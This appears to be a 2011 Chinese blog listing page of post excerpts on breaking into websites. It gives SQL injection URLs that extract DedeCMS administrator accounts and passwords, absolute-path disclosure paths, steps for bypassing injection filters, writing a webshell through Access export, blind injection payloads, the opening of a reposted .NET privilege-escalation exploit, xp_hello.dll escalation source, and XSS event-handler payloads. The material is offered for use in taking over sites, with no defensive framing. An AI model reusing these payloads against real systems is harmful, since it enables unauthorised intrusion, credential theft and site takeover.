上一页 1 ··· 9 10 11 12 13 14 15 16 17 ··· 24 下一页

2011年4月27日

DedeCMS注入爆管理员用户密码方法

摘要: 搜索关键词:powered by dedecms首先注册个用户,注册地址:/member/index_do.php?fmdo=user&dopost=regnew 爆管理帐号:/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/* 爆管理员密码/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2, 阅读全文

posted @ 2011-04-27 03:42 小宝哥哥 阅读(563) 评论(0) 推荐(0) 编辑

php爆绝对路径的几种方法

摘要: dz 爆绝对路径/uc_server/control/admin/db.php/ucenter/control/admin/db.php/manyou/admincp.php?my_suffix=%0A%0DTOBY57/manyou/userapp.php?%0D%0A=TOBY57WordPress的平台,爆绝对路径的方法是:url/wp-admin/includes/admin.phpurl/wp-content/plugins/akismet/akismet.phpurl/wp-content/plugins/akismet/hello.phpphpMyAdmin暴路径办法:phpMy 阅读全文

posted @ 2011-04-27 03:41 小宝哥哥 阅读(1315) 评论(0) 推荐(1) 编辑

php注入基本步骤

摘要: php注入十点基本步骤1、判断是否存在注入,加'、and 1=1、and 1=22、判断版本and ord(mid(version(),1,1))>51/* 返回正常说明是4.0以上版本,可以用union查询3、利用order by 暴字段,在网址后加 order by 10/* 如果返回正常说明字段大于104、再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./* 直到返回正常报出数字,说明猜到准确字段数。如过滤了空格可以用/**/代替。(可在分别用user()、database()、version()进行替换报出的数字进 阅读全文

posted @ 2011-04-27 03:41 小宝哥哥 阅读(261) 评论(0) 推荐(0) 编辑

拿站时的零碎技巧

摘要: 1、对提交的变量做更改刻绕过防注入:例如:asp?nid=1 可更换为 asp?n%69d=1 2、利用load_file()时.当php环境magic_quote设置为on时,所有的单引号.双引号.反斜杠和null字符都会被加上一个反斜杠进行转意.把需要load的内容转换为16禁止即可.形式:0x633A5C626F6F742E696E69 'c:/boot.ini' 阅读全文

posted @ 2011-04-27 03:40 小宝哥哥 阅读(124) 评论(0) 推荐(0) 编辑

渗透经典命令

摘要: 1:CMD下修改IP地址c:\netshc:\netsh>interfacec:\netsh\interface>ipc:\netsh\interface\ip>dump 显示配置情况netsh -c interface ip dump >c:\ip.txtnetsh interface ip dump >c:\ip.txtnetsh -f c:\ip.txt2:tasklist /svc 任务列表3:taskkill TASKKILL /F /IM notepad.exe /IM mspaint.exe4:systeminfo 显示系统详细信息 set 系统变量 阅读全文

posted @ 2011-04-27 03:38 小宝哥哥 阅读(244) 评论(0) 推荐(0) 编辑

Access库利用后台SQL执行导出webshell渗透

摘要: 今天渗透了一个站点,后台有能执行sql语句的地方,恰好又得到了网站物理路径。以前看到网上有用access导出shell的方法,原理大致和php网站的outfile差不多先将一句话写到数据库中,然后再通过语句写到文件中。这里要将数据表内容导出到一个EXCEL文件中,因为ACCESS数据库不允许导出其他危险格式。我们导出为EXCEL后再利用IIS解析漏洞就可以用客户端连接了需要执行如下操作:(1)create table a (b varchar(50))建立一个有一个b字段的表,表名为a,字段类型为字符,长度为50(2)insert into a (b) values('<%exe 阅读全文

posted @ 2011-04-27 03:36 小宝哥哥 阅读(336) 评论(0) 推荐(0) 编辑

盲注技术讲解

摘要: 判断版本号 http://www.xxx.net/goods.php?id=352&wsid=1%20and%20(1,1)>(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23判断系统http://www.xxx.net/goods.php?id=352&wsid=1%20and%20(1,1)>(select 阅读全文

posted @ 2011-04-27 03:33 小宝哥哥 阅读(183) 评论(0) 推荐(0) 编辑

.net最新提权0day,通杀windows

摘要: ps:这个可以一次编译成功,不用改啦……来自:http://www.exploit-db.com/exploits/16940/exploit-db比较厚道的,不在编译上难为小菜啦……/*# Exploit Title: .NET Runtime Optimization Service Privilege Escalation# Date: 03-07-2011# Author: XenoMuta <xenomuta@tuxfamily.org># Version: v2.0.50727# Tested on: Windows XP (sp3), 2003 R2, 7# CVE 阅读全文

posted @ 2011-04-27 03:31 小宝哥哥 阅读(434) 评论(0) 推荐(0) 编辑

xp_hello.dll(sa) 提权工具

摘要: 主要代码:在VC6里面新建一个储存过程项目,在proc.cpp中写入如下代码:#include <stdafx.h>#include <shellapi.h>#define XP_NOERROR 0#define XP_ERROR 1#define MAXCOLNAME 25#define MAXNAME 25#define MAXTEXT 255#ifdef __cplusplusextern “C” {#endifRETCODE __declspec(dllexport) xp_hello(SRV_PROC *srvproc);#ifdef __cplusplus} 阅读全文

posted @ 2011-04-27 03:27 小宝哥哥 阅读(257) 评论(0) 推荐(0) 编辑

32个触发事件XSS语句的总结

摘要: 1、onmouseenter:当鼠标进入选区执行代码<div style="background-color:red" onmouseenter="alert('bem')">123456</div>2、onmouseleave:当鼠标离开选区执行代码<DIV onmouseleave="alert('bem')" style="BACKGROUND-COLOR: red">123456</DIV>3、onmousewheel:当鼠标在 阅读全文

posted @ 2011-04-27 03:18 小宝哥哥 阅读(585) 评论(0) 推荐(0) 编辑

上一页 1 ··· 9 10 11 12 13 14 15 16 17 ··· 24 下一页

导航

Tasup